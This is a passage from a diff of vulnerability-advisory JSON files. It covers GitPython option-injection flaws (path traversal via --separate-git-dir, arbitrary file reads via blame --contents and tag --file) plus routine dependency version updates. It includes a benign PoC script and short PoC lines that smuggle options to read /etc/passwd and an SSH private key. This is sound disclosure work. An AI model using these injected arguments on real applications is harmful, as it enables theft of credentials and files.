(`--template`, `--upload-pack`, `--config`, `--bundle-uri`) — i.e. it is the same threat model the guard exists to cover, just missing one entry.\n- Verdict: no concrete blocker found. **CONFIRMED.**\n\n## Remediation\nAdd `\"--separate-git-dir\"` (and its `-` alias if git ever adds one — currently there is none) to `Repo.unsafe_git_clone_options` in `git/repo/base.py`, matching `unsafe_git_init_options`. Since `Repo._clone()` already special-cases `separate_git_dir` for `Git.polish_url()` normalization, the fix is a one-line addition to the existing list, consistent with how `GHSA-6p8h-3wgx-97gf` added `--template` to the same list.\n\n## Confidence\nHigh. Root cause is a one-line, unambiguous omission the maintainers' own docstring contradicts; PoC reproduces cleanly and deterministically against the current HEAD; no plausible false-positive path found.\n\n\n## Proof-of-Concept source (`gitpython-001-poc.py`)\n\n```python\n#!/usr/bin/env python3\n\"\"\"\nGITPYTHON-001 PoC: Repo.clone_from(separate_git_dir=...) is not in\nunsafe_git_clone_options, so it reaches `git clone` unguarded and writes a\nfull git directory (config, hooks/, objects/, refs/, ...) to an\nattacker-controlled path OUTSIDE the intended destination directory, with\nallow_unsafe_options left at its default of False.\n\nRun against the GitPython source tree under test, e.g.:\n PYTHONPATH=\":/gitdb:/smmap\" python3 gitpython-001-poc.py \n\nBenign: only writes/reads inside the given workdir. No destructive/exfiltrating\npayload. Exits non-zero and prints \"NOT VULNERABLE\" if the guard blocks the option\nor the write does not escape the destination directory.\n\"\"\"\nimport os\nimport sys\nimport subprocess\n\n\ndef main():\n workdir = sys.argv[1] if len(sys.argv) > 1 else \"/tmp/gitpython-001-poc\"\n src = os.path.join(workdir, \"src\")\n dest = os.path.join(workdir, \"dest\")\n sentinel_dir = os.path.join(workdir, \"OUTSIDE_SENTINEL\")\n target_gitdir = os.path.join(sentinel_dir, \"redirected.git\")\n\n for p in (src, dest, sentinel_dir):\n os.makedirs(p, exist_ok=True)\n\n # Minimal benign source repo to clone from.\n subprocess.run([\"git\", \"init\", \"-q\", \"-b\", \"main\", src], check=True)\n subprocess.run([\"git\", \"-C\", src, \"config\", \"user.email\", \"test@example.com\"], check=True)\n subprocess.run([\"git\", \"-C\", src, \"config\", \"user.name\", \"Test\"], check=True)\n with open(os.path.join(src, \"file.txt\"), \"w\") as f:\n f.write(\"hello\\n\")\n subprocess.run([\"git\", \"-C\", src, \"add\", \"file.txt\"], check=True)\n subprocess.run([\"git\", \"-C\", src, \"commit\", \"-q\", \"-m\", \"init\"], check=True)\n\n import git # gitpython under test\n\n print(\"unsafe_git_clone_options =\", git.Repo.unsafe_git_clone_options)\n assert \"--separate-git-dir\" not in git.Repo.unsafe_git_clone_options, (\n \"guard now includes --separate-git-dir; PoC no longer applicable, target patched\"\n )\n\n try:\n repo = git.Repo.clone_from(src, dest, separate_git_dir=target_gitdir)\n except git.exc.UnsafeOptionError as e:\n print(\"NOT VULNERABLE: blocked by UnsafeOptionError:\", e)\n sys.exit(1)\n\n wrote_outside = os.path.isdir(os.path.join(target_gitdir, \"hooks\")) and os.path.isfile(\n os.path.join(target_gitdir, \"config\")\n )\n gitlink_points_outside = False\n with open(os.path.join(dest, \".git\")) as f:\n gitlink = f.read().strip()\n gitlink_points_outside = target_gitdir in gitlink\n\n print(\"repo.git_dir =\", repo.git_dir)\n print(\"wrote git directory outside dest (sentinel) =\", wrote_outside)\n print(\"dest/.git gitlink points outside dest =\", gitlink_points_outside)\n\n if wrote_outside and gitlink_points_outside:\n print(\"VULNERABLE: git directory created at attacker-controlled path \"\n f\"outside the clone destination: {target_gitdir}\")\n sys.exit(0)\n else:\n print(\"NOT VULNERABLE: sentinel not observed\")\n sys.exit(1)\n\n\nif __name__ == \"__main__\":\n main()\n\n```", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + }, { "type": "CVSS_V4", - "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" } ], "references": [ + { + "type": "WEB", + "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-8mcc-hrx5-hvxc" + }, { "type": "ADVISORY", - "url": "https://www.vulncheck.com/advisories/gitpython-before-path-traversal-via-separate-git-dir" + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-78677" }, { - "type": "EVIDENCE", - "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-8mcc-hrx5-hvxc" + "type": "WEB", + "url": "https://github.com/gitpython-developers/GitPython/pull/2210" + }, + { + "type": "WEB", + "url": "https://github.com/gitpython-developers/GitPython/commit/b68afff45af0f49e79a3e2d2162018986b37ad5d" + }, + { + "type": "PACKAGE", + "url": "https://github.com/gitpython-developers/GitPython" + }, + { + "type": "WEB", + "url": "https://github.com/gitpython-developers/GitPython/releases/tag/3.1.59" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/gitpython/PYSEC-2026-3787.yaml" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gitpython-before-path-traversal-via-separate-git-dir" } ] } diff --git a/advisories/BREW-snowflake-cli-CVE-2026-78678.json b/advisories/BREW-snowflake-cli-CVE-2026-78678.json index 2129890bb13..b31680b5526 100644 --- a/advisories/BREW-snowflake-cli-CVE-2026-78678.json +++ b/advisories/BREW-snowflake-cli-CVE-2026-78678.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2026-78678", "published": "2026-09-04T10:05:02Z", - "modified": "2026-09-04T10:05:02Z", + "modified": "2026-09-10T20:56:29Z", "upstream": [ "PYSEC-2026-3788", "CVE-2026-78678", @@ -21,16 +21,19 @@ "events": [ { "introduced": "0" + }, + { + "fixed": "3.27.0" } ] } ], "ecosystem_specific": { - "fix": null, - "range_state": "affected", + "fix": "bump", + "range_state": "fixed", "upstream_fixed_in": "3.1.59", "resource": "gitpython", - "resource_purl": "pkg:pypi/gitpython@3.1.58" + "resource_purl": "pkg:pypi/gitpython@3.1.59" } } ], @@ -43,27 +46,40 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "gitpython", - "subject_version": "3.1.58", - "key": "pkg:pypi/gitpython@3.1.58", + "subject_version": "3.1.59", + "key": "pkg:pypi/gitpython@3.1.59", "resource": "gitpython" } ] }, - "details": "GitPython versions before 3.1.59 contain an incomplete denylist in the unsafe_git_revision_options guard that omits --contents and -S options, allowing attackers to read arbitrary files by passing these options to Repo.blame(). Attackers can supply revision values like --contents=/etc/passwd to leak file contents through the blame result returned to the caller.", + "summary": "GitPython: Incomplete unsafe_git_revision_options denylist omits --contents/-S, enabling arbitrary file read via Repo.blame()", + "details": "## Summary\n`Repo.blame()` / `Repo.blame_incremental()` guard forwarded revision options against `unsafe_git_revision_options`, but that denylist only contains the file-WRITE options `--output`/`-o`. `git blame` also honors `--contents ` and `-S `, which cause the file's lines to be echoed into the blame result — an arbitrary file READ. Neither option is in the denylist, so a caller-influenced revision value of `--contents=` passes the guard and leaks file contents. This is a distinct sink-option and impact class (READ) from GHSA-956x-8gvw-wg5v (which addressed the blame `--output` WRITE), directly analogous to GHSA-539m-9xh6-q6rr (archive READ gap accepted separately from the archive write/exec advisory).\n\n## Root Cause\n`unsafe_git_revision_options = [\"--output\",\"-o\"]` (`git/repo/base.py:188`). The `rev` string is passed to `_option_candidates([rev], kwargs)` and placed BEFORE the `--` separator (base.py:841). The canonical name of `--contents=...` is `contents`, which is not on the denylist, so no `UnsafeOptionError` is raised. The trailing `--` protects only the pathspec, not the option before the revision.\n\n## Impact\nArbitrary local file read at the privileges of the host process; the file's line contents appear in the blame result returned to the caller. Pure VALUE control (the caller forwards a user-influenced revision string). Default `allow_unsafe_options=False`.\n\n## Proof of Concept\n```python\nresult = repo.blame(\"--contents=/etc/passwd\", \"a.txt\")\n# result rows carry the victim file's line text\n```\n\n## Attack Chain\n1. Entry: app calls `repo.blame(rev, file)` with attacker `rev=\"--contents=/etc/passwd\"` (or kwarg `contents=\"/etc/passwd\"`, or `-S`).\n2. Check: `Git.check_unsafe_options(_option_candidates([rev,...], kwargs), unsafe_git_revision_options)` @ base.py:841. Guard: denylist = `[\"--output\",\"-o\"]` only. Bypass proof: canonical name `contents` ∉ denylist → no error.\n3. Sink: `self.git.blame(rev, \"--\", file, p=True, ...)`. argv (observed): `['git','blame','-p','--contents=','HEAD','--','a.txt']`.\n4. Impact: blame result rows carry the victim file's line text.\n\n## Bypass Evidence\nIndependently reproduced (independent test harness, default `allow_unsafe_options=False`): `blame('--contents=','a.txt')` → guard PASSED; result rows = `['GATE_SECRET_LINE_A','GATE_SECRET_LINE_B']`. Control: `blame('--output=…')` still BLOCKED (guard active on this path). `-S` kwarg argv also reaches git unguarded.\n\n## Affected Versions\n`GitPython <= 3.1.58` (denylist present verbatim on the latest release tag).\n\n## Suggested Fix\nPrefer an allowlist of blame options; at minimum add `--contents`/`-S` (and any other path-taking blame options) to `unsafe_git_revision_options`, and make the membership rule \"the option takes a filesystem path\" rather than \"the option writes output\".\n\n---\nReported by **zx (Jace)** — GitHub: @manus-use", "severity": [ { - "type": "CVSS_V4", - "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" } ], "references": [ + { + "type": "WEB", + "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-5xxx-qhh7-9287" + }, { "type": "ADVISORY", - "url": "https://www.vulncheck.com/advisories/gitpython-before-arbitrary-file-read-via-repo-blame" + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-78678" }, { - "type": "EVIDENCE", - "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-5xxx-qhh7-9287" + "type": "PACKAGE", + "url": "https://github.com/gitpython-developers/GitPython" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/gitpython/PYSEC-2026-3788.yaml" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gitpython-before-arbitrary-file-read-via-repo-blame" } ] } diff --git a/advisories/BREW-snowflake-cli-CVE-2026-78679.json b/advisories/BREW-snowflake-cli-CVE-2026-78679.json new file mode 100644 index 00000000000..8b863f9603a --- /dev/null +++ b/advisories/BREW-snowflake-cli-CVE-2026-78679.json @@ -0,0 +1,93 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-snowflake-cli-CVE-2026-78679", + "published": "2026-09-10T20:56:29Z", + "modified": "2026-09-10T20:56:29Z", + "upstream": [ + "GHSA-3wxw-xv34-2frg", + "CVE-2026-78679", + "PYSEC-2026-3837" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "snowflake-cli", + "purl": "pkg:brew/snowflake-cli" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.4.1" + }, + { + "fixed": "3.27.0" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "3.1.59", + "resource": "gitpython", + "resource_purl": "pkg:pypi/gitpython@3.1.59" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "gitpython", + "subject_version": "3.1.59", + "key": "pkg:pypi/gitpython@3.1.59", + "resource": "gitpython" + } + ] + }, + "summary": "GitPython: TagReference.create positional reference bypasses kwargs-only --file guard, enabling arbitrary file read (incomplete fix of 3af0c251)", + "details": "## Summary\n`TagReference.create()` forwards a caller-influenced positional `reference` value into `git tag` without it ever being inspected by the unsafe-option guard, allowing an arbitrary file read (the file's contents are returned in-band as the annotated tag message). This is an incomplete-fix bypass of commit `3af0c251` (the fix for GHSA-3f7w-8rr8-f37f's tag instance).\n\n## Root Cause\nThe fix `3af0c251` added `unsafe_git_tag_options = [\"--file\",\"-F\"]` and a guard call, but the guard is `Git.check_unsafe_options(options=Git._option_candidates([], kwargs), unsafe_options=...)` at `git/refs/tag.py:139` — it passes an EMPTY args list and inspects **kwargs only**. The dangerous values `path` and `reference` are POSITIONALS (`args = (path, reference)`, tag.py:156), placed before any `--`. A user-influenced `reference=\"--file=\"` therefore reaches `git tag` as the exact `--file` option the fix intended to block, creating an annotated tag whose message is the file's contents.\n\n## Impact\nArbitrary local file read at the privileges of the host process; contents returned in-band via `tagref.tag.message`. Requires the embedding application to forward a caller-influenced `reference` value into `TagReference.create()` (pure VALUE control — the CVE-2026-42215 threat model). Default `allow_unsafe_options=False`.\n\n## Proof of Concept\n```python\nfrom git import TagReference\nt = TagReference.create(repo, \"vpwn\", reference=\"--file=/home/app/.ssh/id_rsa\")\nprint(t.tag.message) # contents of the file\n```\n\n## Attack Chain\n1. Entry: app calls `TagReference.create(repo, name, reference=)` with `reference=\"--file=/home/app/.ssh/id_rsa\"`.\n2. Check: `Git.check_unsafe_options(_option_candidates([], kwargs), [\"--file\",\"-F\"])` @ tag.py:137-141. Guard: denylist includes `--file`/`-F`. Bypass proof: `_option_candidates` receives `args=[]` → the positional `reference` is never a candidate (the kwarg spelling `file=\"…\"` IS blocked; only the positional escapes).\n3. Sink: `repo.git.tag(*args, **kwargs)` @ tag.py:158 → no `--`. argv (observed): `['git','tag','-f','vpwn','--file=']`.\n4. Impact: annotated tag created; `tagref.tag.message` == file contents (arbitrary file read).\n\n## Bypass Evidence\nIndependently reproduced (independent test harness, git 2.43.0, default `allow_unsafe_options=False`): `TagReference.create(repo,'vp','--file=')` → PASSED; `tag.message == 'GATE_SECRET_LINE_A\\nGATE_SECRET_LINE_B'`. Control: `TagReference.create(..., file='')` → `UnsafeOptionError: --file is not allowed`. Fix-commit read: `3af0c251` adds `_option_candidates([], kwargs)` (empty args → positional never a candidate).\n\n## Affected Versions\n`GitPython <= 3.1.58` (sink present verbatim on the latest release tag; `git diff 3.1.57..HEAD` touches only test files).\n\n## Suggested Fix\nInclude the positional `reference` (and `path`) in the option-candidate list passed to `check_unsafe_options`, or place a `--` separator before the positional arguments in `TagReference.create()`.\n\n---\nReported by **zx (Jace)** — GitHub: @manus-use", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-3wxw-xv34-2frg" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-78679" + }, + { + "type": "WEB", + "url": "https://github.com/gitpython-developers/GitPython/pull/2208" + }, + { + "type": "WEB", + "url": "https://github.com/gitpython-developers/GitPython/commit/1b0d2d9b91575f7db44ef4ff58ac37fc9335e5f6" + }, + { + "type": "PACKAGE", + "url": "https://github.com/gitpython-developers/GitPython" + }, + { + "type": "WEB", + "url": "https://github.com/gitpython-developers/GitPython/releases/tag/3.1.59" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gitpython-before-arbitrary-file-read-via-tagreference-create" + } + ] +} diff --git a/advisories/BREW-strands-agents-sops-CVE-2017-11424.json b/advisories/BREW-strands-agents-sops-CVE-2017-11424.json index a675cfc7b9d..4514f6d035c 100644 --- a/advisories/BREW-strands-agents-sops-CVE-2017-11424.json +++ b/advisories/BREW-strands-agents-sops-CVE-2017-11424.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-strands-agents-sops-CVE-2017-11424", "published": "2026-08-13T17:41:09Z", - "modified": "2026-08-13T17:41:09Z", + "modified": "2026-09-10T21:05:20Z", "upstream": [ "GHSA-r9jw-mwhq-wp62", "CVE-2017-11424", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyjwt", - "subject_version": "2.13.0", - "key": "pkg:pypi/pyjwt@2.13.0", - "resource": "pyjwt" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-strands-agents-sops-CVE-2020-7694.json b/advisories/BREW-strands-agents-sops-CVE-2020-7694.json index dd9db8e9d9c..4f7fe547b39 100644 --- a/advisories/BREW-strands-agents-sops-CVE-2020-7694.json +++ b/advisories/BREW-strands-agents-sops-CVE-2020-7694.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-strands-agents-sops-CVE-2020-7694", "published": "2026-08-13T17:41:09Z", - "modified": "2026-08-13T17:41:09Z", + "modified": "2026-09-10T21:05:20Z", "upstream": [ "GHSA-33c7-2mpw-hg34", "CVE-2020-7694", @@ -34,7 +34,7 @@ "range_state": "fixed", "upstream_fixed_in": "0.11.7", "resource": "uvicorn", - "resource_purl": "pkg:pypi/uvicorn@0.52.1" + "resource_purl": "pkg:pypi/uvicorn@0.52.4" } } ], @@ -47,16 +47,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "uvicorn", - "subject_version": "0.52.1", - "key": "pkg:pypi/uvicorn@0.52.1", - "resource": "uvicorn" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "uvicorn", - "subject_version": "0.52.1", - "key": "pkg:pypi/uvicorn@0.52.1", + "subject_version": "0.52.4", + "key": "pkg:pypi/uvicorn@0.52.4", "resource": "uvicorn" } ] diff --git a/advisories/BREW-strands-agents-sops-CVE-2020-7695.json b/advisories/BREW-strands-agents-sops-CVE-2020-7695.json index 5502ac9dfcc..0094b99b6d4 100644 --- a/advisories/BREW-strands-agents-sops-CVE-2020-7695.json +++ b/advisories/BREW-strands-agents-sops-CVE-2020-7695.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-strands-agents-sops-CVE-2020-7695", "published": "2026-08-13T17:41:09Z", - "modified": "2026-08-13T17:41:09Z", + "modified": "2026-09-10T21:05:20Z", "upstream": [ "GHSA-f97h-2pfx-f59f", "CVE-2020-7695", @@ -34,7 +34,7 @@ "range_state": "fixed", "upstream_fixed_in": "0.11.7", "resource": "uvicorn", - "resource_purl": "pkg:pypi/uvicorn@0.52.1" + "resource_purl": "pkg:pypi/uvicorn@0.52.4" } } ], @@ -47,16 +47,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "uvicorn", - "subject_version": "0.52.1", - "key": "pkg:pypi/uvicorn@0.52.1", - "resource": "uvicorn" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "uvicorn", - "subject_version": "0.52.1", - "key": "pkg:pypi/uvicorn@0.52.1", + "subject_version": "0.52.4", + "key": "pkg:pypi/uvicorn@0.52.4", "resource": "uvicorn" } ] diff --git a/advisories/BREW-strands-agents-sops-CVE-2022-29217.json b/advisories/BREW-strands-agents-sops-CVE-2022-29217.json index a25ebbb2692..745043375e3 100644 --- a/advisories/BREW-strands-agents-sops-CVE-2022-29217.json +++ b/advisories/BREW-strands-agents-sops-CVE-2022-29217.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-strands-agents-sops-CVE-2022-29217", "published": "2026-08-13T17:41:09Z", - "modified": "2026-08-13T17:41:09Z", + "modified": "2026-09-10T21:05:20Z", "upstream": [ "GHSA-ffqj-6fqr-9h24", "CVE-2022-29217", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyjwt", - "subject_version": "2.13.0", - "key": "pkg:pypi/pyjwt@2.13.0", - "resource": "pyjwt" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-strands-agents-sops-CVE-2023-29159.json b/advisories/BREW-strands-agents-sops-CVE-2023-29159.json index 372530e5e0e..733f5dcba9d 100644 --- a/advisories/BREW-strands-agents-sops-CVE-2023-29159.json +++ b/advisories/BREW-strands-agents-sops-CVE-2023-29159.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-strands-agents-sops-CVE-2023-29159", "published": "2026-08-13T17:41:09Z", - "modified": "2026-08-13T17:41:09Z", + "modified": "2026-09-10T21:05:20Z", "upstream": [ "GHSA-v5gw-mw7f-84px", "CVE-2023-29159", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "0.27.0", "resource": "starlette", - "resource_purl": "pkg:pypi/starlette@1.4.1" + "resource_purl": "pkg:pypi/starlette@1.6.0" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "starlette", - "subject_version": "1.4.1", - "key": "pkg:pypi/starlette@1.4.1", - "resource": "starlette" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "starlette", - "subject_version": "1.4.1", - "key": "pkg:pypi/starlette@1.4.1", + "subject_version": "1.6.0", + "key": "pkg:pypi/starlette@1.6.0", "resource": "starlette" } ] diff --git a/advisories/BREW-strands-agents-sops-CVE-2023-30798.json b/advisories/BREW-strands-agents-sops-CVE-2023-30798.json index b741f54e0e1..b31ad71c45d 100644 --- a/advisories/BREW-strands-agents-sops-CVE-2023-30798.json +++ b/advisories/BREW-strands-agents-sops-CVE-2023-30798.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-strands-agents-sops-CVE-2023-30798", "published": "2026-08-13T17:41:09Z", - "modified": "2026-08-13T17:41:09Z", + "modified": "2026-09-10T21:05:20Z", "upstream": [ "GHSA-74m5-2c7w-9w3x", "CVE-2023-30798", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "0.25.0", "resource": "starlette", - "resource_purl": "pkg:pypi/starlette@1.4.1" + "resource_purl": "pkg:pypi/starlette@1.6.0" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "starlette", - "subject_version": "1.4.1", - "key": "pkg:pypi/starlette@1.4.1", - "resource": "starlette" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "starlette", - "subject_version": "1.4.1", - "key": "pkg:pypi/starlette@1.4.1", + "subject_version": "1.6.0", + "key": "pkg:pypi/starlette@1.6.0", "resource": "starlette" } ] diff --git a/advisories/BREW-strands-agents-sops-CVE-2024-24762.json b/advisories/BREW-strands-agents-sops-CVE-2024-24762.json index efdc2da84fa..682fb3714db 100644 --- a/advisories/BREW-strands-agents-sops-CVE-2024-24762.json +++ b/advisories/BREW-strands-agents-sops-CVE-2024-24762.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-strands-agents-sops-CVE-2024-24762", "published": "2026-08-13T17:41:09Z", - "modified": "2026-08-13T17:41:09Z", + "modified": "2026-09-10T21:05:20Z", "upstream": [ "GHSA-2jv5-9r88-3w3p", "CVE-2024-24762", @@ -44,14 +44,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "python-multipart", - "subject_version": "0.0.32", - "key": "pkg:pypi/python-multipart@0.0.32", - "resource": "python-multipart" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-strands-agents-sops-CVE-2024-3651.json b/advisories/BREW-strands-agents-sops-CVE-2024-3651.json index eacc34839c5..675b6eddaaa 100644 --- a/advisories/BREW-strands-agents-sops-CVE-2024-3651.json +++ b/advisories/BREW-strands-agents-sops-CVE-2024-3651.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-strands-agents-sops-CVE-2024-3651", "published": "2026-08-13T17:41:09Z", - "modified": "2026-08-13T17:41:09Z", + "modified": "2026-09-10T21:05:20Z", "upstream": [ "GHSA-jjg7-2v4v-x38h", "CVE-2024-3651", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.7", "resource": "idna", - "resource_purl": "pkg:pypi/idna@3.18" + "resource_purl": "pkg:pypi/idna@3.19" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "idna", - "subject_version": "3.18", - "key": "pkg:pypi/idna@3.18", - "resource": "idna" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "idna", - "subject_version": "3.18", - "key": "pkg:pypi/idna@3.18", + "subject_version": "3.19", + "key": "pkg:pypi/idna@3.19", "resource": "idna" } ] diff --git a/advisories/BREW-strands-agents-sops-CVE-2024-47874.json b/advisories/BREW-strands-agents-sops-CVE-2024-47874.json index 7e074fcb7dc..ee51866751c 100644 --- a/advisories/BREW-strands-agents-sops-CVE-2024-47874.json +++ b/advisories/BREW-strands-agents-sops-CVE-2024-47874.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-strands-agents-sops-CVE-2024-47874", "published": "2026-08-13T17:41:09Z", - "modified": "2026-08-13T17:41:09Z", + "modified": "2026-09-10T21:05:20Z", "upstream": [ "GHSA-f96h-pmfr-66vw", "CVE-2024-47874", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "0.40.0", "resource": "starlette", - "resource_purl": "pkg:pypi/starlette@1.4.1" + "resource_purl": "pkg:pypi/starlette@1.6.0" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "starlette", - "subject_version": "1.4.1", - "key": "pkg:pypi/starlette@1.4.1", - "resource": "starlette" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "starlette", - "subject_version": "1.4.1", - "key": "pkg:pypi/starlette@1.4.1", + "subject_version": "1.6.0", + "key": "pkg:pypi/starlette@1.6.0", "resource": "starlette" } ] diff --git a/advisories/BREW-strands-agents-sops-CVE-2024-53861.json b/advisories/BREW-strands-agents-sops-CVE-2024-53861.json index 8382700be7a..f2b84eb4b9f 100644 --- a/advisories/BREW-strands-agents-sops-CVE-2024-53861.json +++ b/advisories/BREW-strands-agents-sops-CVE-2024-53861.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-strands-agents-sops-CVE-2024-53861", "published": "2026-08-13T17:41:09Z", - "modified": "2026-08-13T17:41:09Z", + "modified": "2026-09-10T21:05:20Z", "upstream": [ "GHSA-75c5-xw7c-p5pm", "CVE-2024-53861", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyjwt", - "subject_version": "2.13.0", - "key": "pkg:pypi/pyjwt@2.13.0", - "resource": "pyjwt" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-strands-agents-sops-CVE-2024-53981.json b/advisories/BREW-strands-agents-sops-CVE-2024-53981.json index abc7511bb28..68bb45201c9 100644 --- a/advisories/BREW-strands-agents-sops-CVE-2024-53981.json +++ b/advisories/BREW-strands-agents-sops-CVE-2024-53981.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-strands-agents-sops-CVE-2024-53981", "published": "2026-08-13T17:41:09Z", - "modified": "2026-08-13T17:41:09Z", + "modified": "2026-09-10T21:05:20Z", "upstream": [ "GHSA-59g5-xgcq-4qw3", "CVE-2024-53981", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "python-multipart", - "subject_version": "0.0.32", - "key": "pkg:pypi/python-multipart@0.0.32", - "resource": "python-multipart" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-strands-agents-sops-CVE-2025-43859.json b/advisories/BREW-strands-agents-sops-CVE-2025-43859.json index deef75d92b1..0b40feef014 100644 --- a/advisories/BREW-strands-agents-sops-CVE-2025-43859.json +++ b/advisories/BREW-strands-agents-sops-CVE-2025-43859.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-strands-agents-sops-CVE-2025-43859", "published": "2026-08-13T17:41:09Z", - "modified": "2026-08-13T17:41:09Z", + "modified": "2026-09-10T21:03:15Z", "upstream": [ "GHSA-vqfr-h8mv-ghfj", "CVE-2025-43859", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "h11", - "subject_version": "0.16.0", - "key": "pkg:pypi/h11@0.16.0", - "resource": "h11" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-strands-agents-sops-CVE-2025-53365.json b/advisories/BREW-strands-agents-sops-CVE-2025-53365.json index ad273e0e2a6..b7637bc1ab9 100644 --- a/advisories/BREW-strands-agents-sops-CVE-2025-53365.json +++ b/advisories/BREW-strands-agents-sops-CVE-2025-53365.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-strands-agents-sops-CVE-2025-53365", "published": "2026-08-13T17:41:09Z", - "modified": "2026-08-13T17:41:09Z", + "modified": "2026-09-10T21:05:20Z", "upstream": [ "GHSA-j975-95f5-7wqh", "CVE-2025-53365", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "1.10.0", "resource": "mcp", - "resource_purl": "pkg:pypi/mcp@2.0.0" + "resource_purl": "pkg:pypi/mcp@2.2.0" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "mcp", - "subject_version": "2.0.0", - "key": 